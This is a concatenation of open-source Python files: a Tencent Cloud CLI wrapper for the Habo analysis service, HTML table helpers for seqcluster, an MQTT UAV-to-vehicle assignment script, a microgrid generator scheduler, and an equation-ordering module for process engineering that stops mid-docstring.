# -*- coding: utf-8 -*- import os import json import tccli.options_define as OptionsDefine import tccli.format_output as FormatOutput from tccli import __version__ from tccli.utils import Utils from tccli.exceptions import ConfigurationError from tencentcloud.common import credential from tencentcloud.common.profile.http_profile import HttpProfile from tencentcloud.common.profile.client_profile import ClientProfile from tencentcloud.habo.v20181203 import habo_client as habo_client_v20181203 from tencentcloud.habo.v20181203 import models as models_v20181203 def doStartAnalyse(args, parsed_globals): g_param = parse_global_arg(parsed_globals) cred = credential.Credential( g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token] ) http_profile = HttpProfile( reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]), reqMethod="POST", endpoint=g_param[OptionsDefine.Endpoint] ) profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256") mod = CLIENT_MAP[g_param[OptionsDefine.Version]] client = mod.HaboClient(cred, g_param[OptionsDefine.Region], profile) client._sdkVersion += ("_CLI_" + __version__) models = MODELS_MAP[g_param[OptionsDefine.Version]] model = models.StartAnalyseRequest() model.from_json_string(json.dumps(args)) rsp = client.StartAnalyse(model) result = rsp.to_json_string() try: json_obj = json.loads(result) except TypeError as e: json_obj = json.loads(result.decode('utf-8')) # python3.3 FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter]) def doDescribeStatus(args, parsed_globals): g_param = parse_global_arg(parsed_globals) cred = credential.Credential( g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token] ) http_profile = HttpProfile( reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]), reqMethod="POST", endpoint=g_param[OptionsDefine.Endpoint] ) profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256") mod = CLIENT_MAP[g_param[OptionsDefine.Version]] client = mod.HaboClient(cred, g_param[OptionsDefine.Region], profile) client._sdkVersion += ("_CLI_" + __version__) models = MODELS_MAP[g_param[OptionsDefine.Version]] model = models.DescribeStatusRequest() model.from_json_string(json.dumps(args)) rsp = client.DescribeStatus(model) result = rsp.to_json_string() try: json_obj = json.loads(result) except TypeError as e: json_obj = json.loads(result.decode('utf-8')) # python3.3 FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter]) CLIENT_MAP = { "v20181203": habo_client_v20181203, } MODELS_MAP = { "v20181203": models_v20181203, } ACTION_MAP = { "StartAnalyse": doStartAnalyse, "DescribeStatus": doDescribeStatus, } AVAILABLE_VERSION_LIST = [ "v20181203", ] def action_caller(): return ACTION_MAP def parse_global_arg(parsed_globals): g_param = parsed_globals is_exist_profile = True if not parsed_globals["profile"]: is_exist_profile = False g_param["profile"] = "default" configure_path = os.path.join(os.path.expanduser("~"), ".tccli") is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure") is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential") conf = {} cred = {} if is_conf_exist: conf = Utils.load_json_msg(conf_path) if is_cred_exist: cred = Utils.load_json_msg(cred_path) if not (isinstance(conf, dict) and isinstance(cred, dict)): raise ConfigurationError( "file: %s or %s is not json format" % (g_param["profile"] + ".configure", g_param["profile"] + ".credential")) if OptionsDefine.Token not in cred: cred[OptionsDefine.Token] = None if not is_exist_profile: if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY): cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID) cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY) cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN) if os.environ.get(OptionsDefine.ENV_REGION): conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION) for param in g_param.keys(): if g_param[param] is None: if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]: if param in cred: g_param[param] = cred[param] else: raise ConfigurationError("%s is invalid" % param) elif param in [OptionsDefine.Region, OptionsDefine.Output]: if param in conf: g_param[param] = conf[param] else: raise ConfigurationError("%s is invalid" % param) try: if g_param[OptionsDefine.ServiceVersion]: g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '') else: version = conf["habo"][OptionsDefine.Version] g_param[OptionsDefine.Version] = "v" + version.replace('-', '') if g_param[OptionsDefine.Endpoint] is None: g_param[OptionsDefine.Endpoint] = conf["habo"][OptionsDefine.Endpoint] except Exception as err: raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err))) if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST: raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST)) return g_param
36.993865
105
0.696849
60f82d75d1c71227b9c9d63fa12af51e571b9f33
3,045
py
Python
seqcluster/libs/table.py
kkarolis/seqcluster
774e23add8cd4fdc83d626cea3bd1f458e7d060d
[ "MIT" ]
33
2015-01-26T23:18:01.000Z
2022-01-07T21:40:49.000Z
seqcluster/libs/table.py
kkarolis/seqcluster
774e23add8cd4fdc83d626cea3bd1f458e7d060d
[ "MIT" ]
44
2015-01-21T17:43:42.000Z
2021-08-25T15:49:18.000Z
seqcluster/libs/table.py
kkarolis/seqcluster
774e23add8cd4fdc83d626cea3bd1f458e7d060d
[ "MIT" ]
18
2015-05-18T15:34:32.000Z
2021-02-10T17:58:24.000Z
from seqcluster.libs.seqviz import seqviz START1= '''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head><meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>clusters information</title> <style type="text/css" title="currentStyle"> @import "../css/info_css.css"; </style> <script type="text/javascript"> function showstuff(boxid){ document.getElementById(boxid).style.visibility="visible"; } function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden"; } </script> <script src="../js/Scribl.1.1.4.min.js" ></script> <script src="../js/jquery.min.js"></script> <script src="../js/jquery-ui.min.js"></script> <link href="../js/jquery-ui.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="../js/dragscrollable.js"></script> <style> #scribl-zoom-slider { width: 4px; } </style> ''' START2=''' </head> <body id="cluster"> ''' JSSTART= '''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head><meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>clusters information</title> <style type="text/css" title="currentStyle">@import "css/demo_page.css"; @import "css/jquery.dataTables.css";</style><script type="text/javascript" language="javascript" src="js/jquery.js"></script> <script type="text/javascript" language="javascript" src="js/jquery.dataTables.js"></script><script type="text/javascript" charset="utf-8">$(document).ready(function() { $('#table').dataTable();} );</script> </head> <body id="dt_example"> ''' END="</body></html>" STABLE='<table cellpadding="0" cellspacing="0" border="0" class="info" id="table" width="500px">' SHR="<tr>" ETABLE="</tbody></table>" EHR="</tr>\n" HEADER_SEQ=["sequence","size"] HEADER_L=["position","annotation (element:strand)-(distance to 5,distance to 3)"] def tab2table(file,output): f = open(file, 'r') header=f.readline().strip() for line in f: line=line.strip() cols = line.split("\t") f.close() return 0 def make_cell(cell): return "<td>%s</td>" % str(cell) def make_hs_link(id): return "<a id=\"myLink\" href=\"javascript:showstuff(%s);\">show</a> <a id=\"myLink\" href=\"javascript:hidestuff(%s);\">hide</a>" % (id,id) def make_cell_link(cell,link): return "<td><a href=%s>%s</a></td>" % (link,str(cell)) def make_line(line): return SHR+line+EHR def make_table(c,name): tmp=STABLE return "%s %s %s " % (tmp,c,ETABLE) def make_div(c,name,css): return "<div class=%s name=%s id=%s>%s</div>" % (css,name,name,c) def make_jshtml(c,name): tmp=JSSTART return "%s %s %s " % (tmp,c,END ) def make_html(c,showseq,name): header=START1+showseq+START2 return "%s %s %s " % (header,c,END) def make_header(c): return "<thead><tr>%s</tr></thead><tbody>" % c def make_cell_header(c): return "<th>%s</th>\n" % c def make_a(c,name): return "<a name=%s>%s</a>\n" % (name,c) def make_link(c,link): return "<a href=%s>%s</a>" % (link,c)
29
210
0.658456
d8698eb6f4a5c4caa030663f996926a1f91653e9
5,255
py
Python
uav.py
ashishkishor/Internet-of-Things-IOT-
1cfd9f4890ee39111f1a1610e45c378299e30698
[ "MIT" ]
null
null
null
uav.py
ashishkishor/Internet-of-Things-IOT-
1cfd9f4890ee39111f1a1610e45c378299e30698
[ "MIT" ]
null
null
null
uav.py
ashishkishor/Internet-of-Things-IOT-
1cfd9f4890ee39111f1a1610e45c378299e30698
[ "MIT" ]
null
null
null
import paho.mqtt.client as mqttClient import time import random import math import sys import json #importing all the libraries all_data=[] #to store preferences of individual UAV in list ls=[] #to know how many vehicle are left to get picked in case of ties all_clients = [] #all UAV list uav_location=[] total_input=0 r=int(sys.argv[2]) #to know how many UAV are there in system for i in range(1, r): all_clients.append('uav' + str(i)) ls.append(i) vehicle_location = [] ans=[] v={} def distance(curr, to):#to calculate distance between UAV location and vehicle location return math.sqrt((to[1] - curr[1]) ** 2 + (to[2] - curr[2]) ** 2) def on_connect(client, userdata, flags, rc): if rc == 0: print("Connected to broker") global Connected # Use global variable Connected = True # Signal connection else: print("Connection failed Return Code : ", rc) def on_message(client, userdata, message): #to receive msg from HQ and other UAV's via broker # Task-5 Write code here if(message.topic=='location/hq'): #if msg came from HQ based on msg topic a= str(message.payload.decode("utf-8", "ignore")) #a=str(message.payload) #print(a) #print("ashish") a=a.split() #print(a) #print("as") for i in range(0,12,2): vehicle_location.append(dict({1:int(a[i]),2:int(a[i+1])})) #print(vehicle_location) else: #if msg came from other UAV a=str(message.payload.decode("utf-8","ignore")) #print("ashish") #print(message.topic) all_data.append(dict({1:message.topic[len(message.topic)-1],2:int(a)})) #print(all_data) #print("ashish") #d = json.loads(message.payload) #if (distance(d, curr) < 20): #contact.append(str(message.topic)) # Task-1 Write code here client_name = sys.argv[1] #getting the UAV name client_name="uav"+client_name print(client_name) broker_address = "127.0.0.1" # Broker address port = 1883 with open(str(client_name)+".txt","r") as fp: #reading UAV location from txt file lines=fp.readlines() for line in lines: a=line.split() uav_location.append(dict({1:int(a[0]),2:int(a[1])})) # Task-2 Write code here # create new instance MQTT client # client #print(uav_location) client = mqttClient.Client(client_name) client.on_connect = on_connect # attach function to callback client.on_message = on_message # attach function to callback client.connect(broker_address, port=port) # connect to broker client.loop_start() # start the loop client.subscribe("location/hq") #to connect to HQ for item in all_clients: #to connect to other UAV if (item != client_name): client.subscribe("location/" + item) #print(len(uav_location)) #print(vehicle_location) #print(len(vehicle_location)) #end_time = time.time() + 15 #while time.time() < end_time: # Task-4 Write code here #curr = location_generator() time.sleep(6) #wait to read all data from text file end_time=time.time()+len(uav_location)*10 while time.time() < end_time: print(len(uav_location)) print(len(vehicle_location)) #print(vehicle_location) #print(uav_location[total_input]) for i in range(0, len(vehicle_location)): #print(distance(vehicle_location[i], uav_location[0])) v = dict({1: i + 1, 2: distance(vehicle_location[i], uav_location[total_input%len(uav_location)])}) ans.append(v) ans=sorted(ans, key=lambda i: i[2]) print(ans) preferred_list=[] #preference of a UAV in sorted order for i in ans: preferred_list.append(i[1]) print(preferred_list) print("ashish") #all_data.append(dict({1:client_name[len(client_name)-1],2:preferred_list})) ans = [] vehicle_location = [] time.sleep(2) #listToStr = ' '.join([str(elem) for elem in preferred_list]) t0=time.time() client.publish("location/" + client_name,str(preferred_list[0])) #senidng UAV preference to broker total_input+=1 time.sleep(5) value="" all_data=sorted(all_data,key=lambda i:i[1]) print(all_data) for i in all_data: if(int(i[1])<int(client_name[len(client_name)-1])): preferred_list.remove(i[2]) value+=str(int(client_name[len(client_name)-1])) +"#"+str(preferred_list[0]) #based on ID preference """ for i in range(len(all_clients)): flag=0 #print(i+1) for j in all_data[i][2]: #print(j) if(j in ls): value.append(dict({1:i+1, 2: j})) ls.remove(j) flag=1 if(flag==1): break """ ls=[] client.publish("preference/" + client_name, str(value)) #sending the assigned vehicle back to HQ t1 = time.time() #print(t1-t0) preferred_list = [] value="" all_data=[] for i in range(0,7): ls.append(i) time.sleep(3) # for item in all_clients: # if(item!=client_name): client.loop_stop() print("exiting") #print(contact) #time.sleep(200)
31.848485
108
0.618649
ed22a40875a7bcb48174eea7fe92f2b936a35ac3
8,389
py
Python
MiGRIDS/Model/Controls/genSchedule0.py
mmuellerstoffels/GBSTools
aebd8aa6667a2284aaa16424f9b9d22ca3a2a375
[ "MIT" ]
8
2019-02-18T14:18:55.000Z
2022-03-04T12:34:24.000Z
MiGRIDS/Model/Controls/genSchedule0.py
mmuellerstoffels/GBSTools
aebd8aa6667a2284aaa16424f9b9d22ca3a2a375
[ "MIT" ]
3
2019-02-13T09:42:08.000Z
2019-05-10T16:59:02.000Z
MiGRIDS/Model/Controls/genSchedule0.py
acep-uaf/GBSTools
aebd8aa6667a2284aaa16424f9b9d22ca3a2a375
[ "MIT" ]
3
2019-06-10T19:49:22.000Z
2021-05-08T08:42:57.000Z
# Project: GBS Tool # Author: Jeremy VanderMeer, jbvandermeer@alaska.edu, Alaska Center for Energy and Power # Date: October 1, 2018 # License: MIT License (see LICENSE file of this package for more information) # imports import numpy as np class genSchedule: def __init__(self,args): # whether to try to minimize fuel consumption or maximize RE contribution (by minimizing MOL of generators) self.minimizeFuel = args['minimizeFuel'] def runSchedule(self, ph, futureLoad, futureRE, scheduledSRCSwitch, scheduledSRCStay, powerAvailToSwitch, powerAvailToStay, underSRC): # scheduled load is the difference between load and RE, the min of what needs to be provided by gen or ess scheduledLoad = max(futureLoad - futureRE,0) ## first find all generator combinations that can supply the load within their operating bounds # find all with capacity over the load and the required SRC capReq = max(int(scheduledLoad - powerAvailToSwitch + scheduledSRCSwitch),0) indCap = np.asarray(ph.lkpGenCombinationsUpperNormalLoading.get(capReq, ph.genCombinationsUpperNormalLoadingMaxIdx), dtype=int) # check if the current online combination is capable of supplying the projected load minus the power available to # help the current generator combination stay online if ph.onlineCombinationID not in indCap and not (True in ph.outOfNormalBounds) and not underSRC: # keep current generating combingation in the mix unless has gone out of bounds for allotted amount #ph.genCombinationsUpperNormalLoading[ph.onlineCombinationID] >= scheduledLoad + scheduledSRCStay - powerAvailToStay: # do not add the current generating option if it is diesel-off and it does not have enough SRC #if not((ph.onlineCombinationID == 0) and underSRC): indCap = np.append(indCap,ph.onlineCombinationID) # if there are no gen combinations large enough to supply, automatically add largest (last combination) if indCap.size == 0: indCap = np.append(indCap,len(ph.genCombinationsUpperNormalLoading)-1) indInBounds = indCap elif indCap.size == 1: indInBounds = indCap else: # find all with MOL under the load indMOLCap = [idx for idx, x in enumerate(ph.genCombinationsMOL[indCap]) if x <= futureLoad] # ind of in bounds combinations indInBounds = indCap[indMOLCap] # if there are no gen combinations with a low enough MOL enough to supply, automatically add combination 1, # which is to smallest generator combination without turning off the generators if indInBounds.size == 0: indInBounds = np.array([indCap[0]]) indInBounds = np.atleast_1d(indInBounds) ## then check how long it will take to switch to any of the combinations online lenGenerators = len(ph.generators) turnOnTime = [None]*lenGenerators turnOffTime = [None]*lenGenerators for idx, gen in enumerate(ph.generators): # get the time remaining to turn on each generator # include this time step in the calculation. this avoids having to wait 1 time step longer than necessary to bring a diesel generator online. turnOnTime[idx] = gen.genStartTime - gen.genStartTimeAct - ph.timeStep # get the time remaining to turn off each generator turnOffTime[idx] = gen.genRunTimeMin - gen.genRunTimeAct - ph.timeStep # Go through each potential combination of generators and find which generators need to be switched on and # offline for each combination lenIndInBounds = indInBounds.size #len(indInBounds) genSwOn = [] # the generators to be switched on for each possible combination genSwOff = [] # the generators to be switched off for each possible combination timeToSwitch = [None]*lenIndInBounds # the time switch for each in bounds generator combination fuelCons = [None]*lenIndInBounds # the predicted fuel consumption for each combination for ind, idx in enumerate(np.atleast_1d(indInBounds)): # for each combination that is in bounds # inititiate the generators to be switched on for this combination to all generators in the combination genSwOn.append(list(ph.genCombinationsID[idx])) # initiate the generators to be switched off for this combination to all generators currently online genSwOff.append(list(ph.genCombinationsID[ph.combinationsID.index(ph.onlineCombinationID)])) # find common elements between switch on and switch off lists commonGen = list(set(genSwOff[-1]).intersection(genSwOn[-1])) # remove common generators from both lists for genID in commonGen: genSwOn[-1].remove(genID) genSwOff[-1].remove(genID) # for each gen to be switched get time, max time for combination is time will take to bring online # find max time to switch generators online onTime = 0 for genID in genSwOn[-1]: # for each to be brought online in the current combination onTime = max(onTime,turnOnTime[ph.genIDS.index(genID)]) # max turn on time # find max of turn on time and turn off time SwitchTime = onTime # initiate to max turn on time for genID in genSwOff[-1]: # for each generator to be switched off in the current combination SwitchTime = max(SwitchTime, turnOffTime[ph.genIDS.index(genID)]) # check if there is a higher turn off time timeToSwitch[ind] = SwitchTime if self.minimizeFuel: # get the generator fuel consumption at this loading for this combination FCpower, FCcons = zip(*ph.genCombinationsFCurve[idx]) # separate out the consumptio n and power # check if this is the online combination. If so, use the power available to stay online to calculate the # the load required by the generator if idx == ph.onlineCombinationID: useScheduledLoad = int(max([scheduledLoad - powerAvailToStay, ph.genCombinationsMOL[idx]])) else: useScheduledLoad = int(max([scheduledLoad - powerAvailToSwitch, ph.genCombinationsMOL[idx]])) indFCcons = getIntListIndex(useScheduledLoad, FCpower) fuelCons[ind] = FCcons[indFCcons] # TODO: Add cost of switching generators ## bring the best option that can be switched immediatley, if any # if the most efficient option can't be switched, start warming up generators # order fuel consumptions if self.minimizeFuel: indSort = np.argsort(fuelCons) else: indSort = np.argsort(ph.genCombinationsMOL[indInBounds]) # if the most efficient can be switched on now, switch to it if timeToSwitch[indSort[0]] <= 0: # update online generator combination ph.onlineCombinationID = ph.combinationsID[indInBounds[indSort[0]]] ph.switchGenComb(genSwOn[indSort[0]], genSwOff[indSort[0]]) # switch generators for idx in range(len(ph.genIDS)): # update genPAvail ph.generators[idx].updateGenPAvail() # otherwise, start or continue warming up generators for most efficient combination else: ph.startGenComb(genSwOn[indSort[0]]) # otherwise, if a generator is out of bounds (not just normal bounds) switch to the best possible, if can if (True in (np.array(timeToSwitch)<=0)) & (True in ph.outOfBounds): # find most efficient option that can be switched now indBest = next((x for x in range(len(indSort)) if timeToSwitch[indSort[x]] <= 0 )) # indBest wrt indSort # update online generator combination ph.onlineCombinationID = ph.combinationsID[indInBounds[indSort[indBest]]] ph.switchGenComb(genSwOn[indSort[indBest]],genSwOff[indSort[indBest]]) # switch generators for idx in range(len(ph.genIDS)): # update genPAvail ph.generators[idx].updateGenPAvail()
61.683824
204
0.669448
cbb79b1d910487205f22699a6b71e2116eae054e
55,158
py
Python
main.py
AntonioRochaAZ/ProcessEngineering
ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1
[ "MIT" ]
null
null
null
main.py
AntonioRochaAZ/ProcessEngineering
ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1
[ "MIT" ]
null
null
null
main.py
AntonioRochaAZ/ProcessEngineering
ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1
[ "MIT" ]
1
2022-01-08T01:13:49.000Z
2022-01-08T01:13:49.000Z
### ALGORITMO DE ORDENAÇÃO DE EQUAÇÕES from warnings import warn import inspect import numpy as np import matplotlib.pyplot as plt from typing import Tuple, Callable, Union, Dict, Generator import networkx as nx # TODO: Make it so that we cannot have two equipments or streams with the same name # Also, add a few details to the aoe2 picking algorithm when mulitple choices are possible # TODO: The dynamically defined functions are interesting, but I think it would # be perhaps more useful if they were defined separately from the objects. # We'll see in the future how this will develop. # TODO: URGENT: # Must stop checking and updating flow composition of outflows, since there # may be chemical reactions that generate products. Keep the addition of the # reactants though (never remove substances, only add them). def aoe2(*fns: Callable, **xs: Union[float, int]): """Equation Ordering Algorithm. The name aoe stands for "Algorítmo de Ordenação de Equações", which means "Equation Ordering Algorithm". The '2' in the name stands for version 2. Args: *fns: Functions that represent the equations that must equal 0. **xs: Specified/Known variable values. Returns: A tuple with the: - The order in which the equations should be solved (expressed through a list called ``func_seq``). - The order in which the variables should be solved for (expressed through a list called ``var_seq``). - A list with the project variables (those that must be specified or optimized). """ fns = list(fns) for entry in fns: if isinstance(entry, Process): for equation in entry.equations(): fns.append(equation) fns.remove(entry) xs["flow"] = None xs["equipment"] = None xs["substance"] = None # Function <-> Arguments dictionaries (NOT INVERSES) func_dict = {} # function -> its arguments var_dict = {} # arguments -> functions it relates to for f in fns: var_list = inspect.getfullargspec(f)[0] func_dict[f] = var_list for var in var_list: if var not in var_dict: var_dict[var] = [f] else: var_dict[var].append(f) if 'plot' in var_dict: raise NameError("Can't have 'plot' as variable name.") elif 'graph' in var_dict: raise NameError("Can't have 'graph' as a variable name.") # Detecting whether or not the system of equations can be solved if len(var_dict) < len(fns): raise ValueError("Impossible system: more Equations than Variables.") # Calculating the Incidence Matrix inmx = np.zeros((len(fns), len(var_dict))) for idx_f, f in enumerate(func_dict): for idx_x, x in enumerate(var_dict): if x in func_dict[f] and x not in xs: inmx[idx_f, idx_x] = 1 #### Definitions # Sequences: func_seq = [None] * min(len(fns), len(var_dict)) var_seq = [None] * min(len(fns), len(var_dict)) # Insert indexes: insert_idx_1 = 0 insert_idx_2 = -1 # List of indexes for opening variables: go_back_list = [] # Dictionaries between number -> function/variable num_func = {i: list(func_dict.keys())[i] for i in range(len(func_dict))} num_var = {i: list(var_dict.keys())[i] for i in range(len(var_dict))} # Dictionaries between function/variable -> number func_num = {y: x for x, y in num_func.items()} var_num = {y: x for x, y in num_var.items()} def plot_incidence_matrix(inmx, ax=None): if ax is None: fig, ax = plt.subplots(1, 1) img = ax.imshow(inmx) ax.set_xticks([i for i in range(len(var_dict))]) ax.set_xticklabels([key for key in var_dict]) ax.set_yticks([i for i in range(len(fns))]) ax.set_yticklabels([key.__name__ for key in func_dict]) ax.set_ylabel("Functions") ax.set_xlabel("Variables") plt.show(block=True) if ('graph' in xs) and (xs['graph']): # TODO: solve the graph "problem" # (Make a botch so that lines can 'bifurcate') # Solution (implemented): make nodes for variables too. function_graph = nx.Graph() function_graph.add_nodes_from(list((f.__name__, {"subset": 1}) for f in fns)) edge_graph = nx.Graph() edge_graph.add_nodes_from(list((f.__name__, {"subset": 1}) for f in fns)) edge_list = [] label_dict = {} for variable in var_dict: functions = var_dict[variable] # if len(functions) > 2 or len(functions) == 1: edge_graph.add_nodes_from([(variable, {'subset': 2})]) for idx1 in range(len(functions)): if len(functions) == 1: t = (variable, functions[idx1].__name__) edge_list.append(t) label_dict[t] = variable for idx2 in range(idx1+1, len(functions)): # if len(functions) > 2: t1 = (functions[idx1].__name__, variable) t2 = (variable, functions[idx2].__name__) edge_list.append(t1) edge_list.append(t2) label_dict[t1] = variable label_dict[t2] = variable # elif len(functions) == 2: # t = (functions[idx1].__name__, functions[idx2].__name__) # edge_list.append(t) # label_dict[t] = variable edge_graph.add_edges_from(edge_list) # graph.add_edges_from(edge_list) function_graph_options = { 'with_labels': True, 'node_color': 'lightgray', 'node_size': 500 } edge_graph_options = { 'with_labels': True, 'node_color': 'lightblue', 'node_size': 500 } hidden_pos = nx.multipartite_layout(edge_graph) pos = {} for key in hidden_pos: if key in function_graph.nodes(): pos[key] = hidden_pos[key] def plot_graph(ax = None, show: bool = False): nx.draw(edge_graph, hidden_pos, **edge_graph_options, ax=ax) nx.draw(function_graph, pos, **function_graph_options, ax=ax) nx.draw_networkx_edge_labels(edge_graph, hidden_pos, edge_labels=label_dict, ax=ax) nx.draw_networkx_edges(edge_graph, hidden_pos, ax=ax) if show: plt.show(block=True) def update_graph(): # Deleting variable nodes that are no longer present: for idx_x in range(len(var_dict)): # number of columns var = num_var[idx_x] if (sum(inmx[:, idx_x]) == 0): if var in edge_graph.nodes(): edge_graph.remove_node(var) if var in label_dict.values(): iterable = list(label_dict.keys()) for key in iterable: if label_dict[key] == var: del label_dict[key] # elif sum(inmx[:, idx_x]) == 1: # if var not in edge_graph.nodes(): # # check in the incidence matrix in the variable is still there for some reason. # # it it only shows up once, and it didn't before, a node has to be created. # edge_graph.add_node(var) # idx_f = np.argmax(inmx[:, idx_x]) # edge_graph.add_edge(var, num_func[idx_f].__name__) for idx_f in range(len(fns)): f = num_func[idx_f].__name__ if sum(inmx[idx_f, :]) == 0 and f in edge_graph.nodes(): function_graph.remove_node(f) edge_graph.remove_node(f) # Updating label_dict: iterable = list(label_dict.keys()) for key in iterable: if f in key: var = label_dict[key] del label_dict[key] if ('plot' in xs) and (xs['plot']): # Base inmx0 for plotting: inmx0 = np.zeros((len(fns), len(var_dict))) for idx_f, f in enumerate(func_dict): for idx_x, x in enumerate(var_dict): if x in func_dict[f]: inmx0[idx_f, idx_x] = 1 fig, axs = plt.subplots(1, 2) fig.set_size_inches(14, 8) ax = axs[0] plot_graph(axs[1]) plot_incidence_matrix(inmx0, ax) else: plot_graph() elif ('plot' in xs) and (xs['plot']): # Base inmx0 for plotting: inmx0 = np.zeros((len(fns), len(var_dict))) for idx_f, f in enumerate(func_dict): for idx_x, x in enumerate(var_dict): if x in func_dict[f]: inmx0[idx_f, idx_x] = 1 plot_incidence_matrix(inmx0) # The actual loop. while True: if ('plot' in xs) and (xs['plot']): if ('graph' in xs) and (xs['graph']): fig, axs = plt.subplots(1, 2) fig.set_size_inches(14, 8) update_graph() plot_graph(axs[1]) ax = axs[0] else: fig, ax = plt.subplots(1, 1) plot_incidence_matrix(inmx, ax) elif ('graph' in xs) and (xs['graph']): update_graph() plot_graph(show=True) # Test for equations with only one variable: for idx_f, row in enumerate(inmx): if sum(row) == 1: idx_x = np.argmax(row) func_seq[insert_idx_1] = idx_f var_seq[insert_idx_1] = idx_x insert_idx_1 += 1 inmx[:, idx_x] = 0 inmx[idx_f, :] = 0 print(f"\nSingle variable equation: {num_func[idx_f].__name__};" f"\nAssociated Variable: {num_var[idx_x]}.") break else: # If the loop didn't break, then no variables were updated # Loop through columns to check for variables of unit frequency: instances = np.zeros(len(var_dict)) for idx_x in range(inmx.shape[1]): col = inmx[:, idx_x] instances[idx_x] = sum(col) if sum(col) == 1: idx_f = np.argmax(col) func_seq[insert_idx_2] = idx_f var_seq[insert_idx_2] = idx_x insert_idx_2 -= 1 inmx[idx_f, :] = 0 print(f"\nVariable of unit frequency: {num_var[idx_x]};\n" f"Associated Equation: {num_func[idx_f].__name__}.") break else: # Loops instances[instances == 0] = 100 idx_x = np.argmin(instances) x = num_var[idx_x] for f in var_dict[x]: idx_f = func_num[f] if idx_f not in func_seq: func_seq[insert_idx_2] = idx_f go_back_list.append(insert_idx_2) insert_idx_2 -= 1 inmx[idx_f, :] = 0 print(f"\nLOOP:\n" f"\tEquation: {num_func[idx_f].__name__};") break else: raise RuntimeError("Unexpected Error.") # If the incidence matrix is empty if not inmx.any(): break # Variáveis de Abertura: open_vars = [] if go_back_list: for idx in go_back_list: idx_list = list(range(len(var_seq)+idx)) # idx_list.reverse() max_idx = -1 for x in func_dict[num_func[func_seq[idx]]]: # If the variable hasn't been attributed: if var_num[x] not in var_seq: # Going backwards in the sequence: for loop_idx in idx_list: if x in func_dict[num_func[func_seq[loop_idx]]]: if loop_idx > max_idx: var_seq[idx] = var_num[x] max_idx = loop_idx print(f"\nSmallest loop so far: " f"{x} with {len(var_seq)+idx - loop_idx} " f"equations of distance.") # Skip to the next variable break open_x = num_var[var_seq[idx]] print(f"\nOpening variable: {open_x}") open_vars.append(open_x) # for x in func_dict[num_func[func_seq[idx]]]: # ai ai # # # if var_num[x] not in var_seq: # var_seq[idx] = var_num[x] # break var_seq = [num_var[i] for i in var_seq] func_seq = [num_func[i] for i in func_seq] proj_vars = [x for x in var_dict if x not in var_seq] print( f"\nEquation sequence:\n", *(f"\t- {func.__name__};\n" for func in func_seq), f"\nVariable sequence:\n", *(f"\t- {x};\n" for x in var_seq), ) if open_vars: print( f"Opening variables:\n", *(f"\t- {x};\n" for x in open_vars) ) if proj_vars: print( f"Project Variables:\n", *(f"\t- {x};\n" for x in proj_vars) ) return func_seq, var_seq, proj_vars class Substance: """Class for a chemical substance. Class Attributes: _name: The molecule's _name mm: Molar mass (kg/kmol). composition: The number of atoms of each element that the molecule has. atomic_mass: Look-up table for atomic masses. """ name = None mm = None T_boil = None latent_heat = None composition = { "H": 0, "He": 0, # ... } @staticmethod def remove_substances(cls_inst: Union['Flow', 'Equipment'], *substances: 'Substance'): """Method for removing substances from a current or equipment. """ for substance in substances: try: cls_inst.composition.remove(substance) except ValueError: # ValueError: list.remove(x): x not in list continue cls_inst._x.pop(f'x_{cls_inst.name}_{substance.name}') @classmethod def cp(substance, T, T_ref: None) -> float: """Function for calculating the substance's cp value at a given temperature T or its mean cp value at a temperature range [T, T_ref] (or [T, T_ref]) .. warning:: ENERGY BALANCES IMPLICITLY ASSUME THAT CP OF COMPLEX SOLUTIONS IS THE WEIGHTED MEAN OF THE INDIVIDUAL SUBSTANCES' CPs. Args: T: The stream's temperature [K]. T_ref: The temperature we are using as a reference [K]. Returns: The mean Cp value at the temperature interval. If there's a phase change, then it will automatically add the latent heat term in such a way that, when the result is multiplied by (T-T_ref), we get the correct result for energy/mass flow rate """ if T_ref is not None: if T < substance.T_boil and substance.T_boil < T_ref: # it's divided by the (T-Tref) so we can get the correct # values when we mutiply it by that factor # Mean at liquid * (Tboil - T_ref)/(T-T_ref) # + (latent_heat/(T - T_ref)) # + Mean at vapour * (T_ref - Tboil)/(T-T_ref) pass elif T > substance.T_boil and substance.T_boil > T_ref: # Wait, is it the same expression? I think so. pass else: # Do the mean at the interval pass else: # Do the mean at the interval pass class Flow: """A process current. TODO: There still need to be constant updates of the w, wmol, x, xmol quantities. Class Attributes: tolerance: Tolerance for mass/molar fraction sum errors. Attributes: composition: A list with the substances present in the flow. w: Flow rate (mass per unit time). x: A 